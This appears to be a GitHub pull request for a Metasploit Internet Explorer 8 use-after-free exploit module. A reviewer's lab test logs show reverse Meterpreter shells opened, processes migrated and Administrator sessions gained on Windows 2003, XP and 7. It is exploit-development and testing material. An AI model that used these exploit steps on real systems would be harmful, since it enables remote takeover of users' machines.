Implement WTFuzz's no-spray technique #1232

Merged
merged 11 commits into from Jan 3, 2013

Conversation

@wchen-r7 (Contributor) commented Jan 3, 2013

Replaces the good old heaplib spray. Also, the trigger is updated. The ROP chains are different from the ones in RopDb (null-byte-free).

I don't know why, for some reason, I have 7 other updates in there while git status tells me nothing about them. But it's ok, because we need to update James' e-mail anyway.

@jvazquez-r7 (Contributor)

Test:

  • Win 2003
msf > use exploit/windows/browser/ie_cbutton_uaf 
msf  exploit(ie_cbutton_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/bXY5RN
[*]  Local IP: http://192.168.1.128:8080/bXY5RN
[*] Server started.
msf  exploit(ie_cbutton_uaf) > [*] 192.168.1.136    ie_cbutton_uaf - Requesting: /bXY5RN
[*] 192.168.1.136    ie_cbutton_uaf - Target selected as: IE 8 on Windows Server 2003
[*] 192.168.1.136    ie_cbutton_uaf - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.136
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.136:1122) at 2013-01-03 19:42:22 +0100
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.136:1122) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3676)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3824
msf  exploit(ie_cbutton_uaf) > sessuibs[+] Successfully migrated to process 
 
[-] Unknown command: sessuibs.
msf  exploit(ie_cbutton_uaf) > sessions 
Active sessions
===============
  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-6ED9DB6CA8\Administrator @ JUAN-6ED9DB6CA8  192.168.1.128:4444 -> 192.168.1.136:1122 (192.168.1.136)
msf  exploit(ie_cbutton_uaf) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
  • Win xp
[*] 192.168.1.142    ie_cbutton_uaf - Requesting: /bXY5RN
[*] 192.168.1.142    ie_cbutton_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.1.142    ie_cbutton_uaf - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.142:2976) at 2013-01-03 19:44:10 +0100
[*] Session ID 2 (192.168.1.128:4444 -> 192.168.1.142:2976) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3976)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 540
[+] Successfully migrated to process 
msf  exploit(ie_cbutton_uaf) > sessions
Active sessions
===============
  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  2   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.1.128:4444 -> 192.168.1.142:2976 (192.168.1.142)
msf  exploit(ie_cbutton_uaf) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
  • Win 7
[*] 192.168.1.137    ie_cbutton_uaf - Requesting: /bXY5RN
[*] 192.168.1.137    ie_cbutton_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.1.137    ie_cbutton_uaf - Sending HTML...
[*] Sending stage (752128 bytes) to 192.168.1.137
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.137:49161) at 2013-01-03 19:45:32 +0100
exit[*] Session ID 3 (192.168.1.128:4444 -> 192.168.1.137:49161) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (512)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3796
[+] Successfully migrated to process 
[*] You have active sessions open, to exit anyway type "exit -y"
msf  exploit(ie_cbutton_uaf) > sessions
Active sessions
===============
  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  3   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  192.168.1.128:4444 -> 192.168.1.137:49161 (192.168.1.137)
msf  exploit(ie_cbutton_uaf) > session -i 3
[-] Unknown command: session.
msf  exploit(ie_cbutton_uaf) > sysinfo
[-] Unknown command: sysinfo.
msf  exploit(ie_cbutton_uaf) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.137 - Meterpreter session 3 closed.  Reason: User exit

Merging!

@jvazquez-r7 jvazquez-r7 merged commit 06b937e into rapid7:master Jan 3, 2013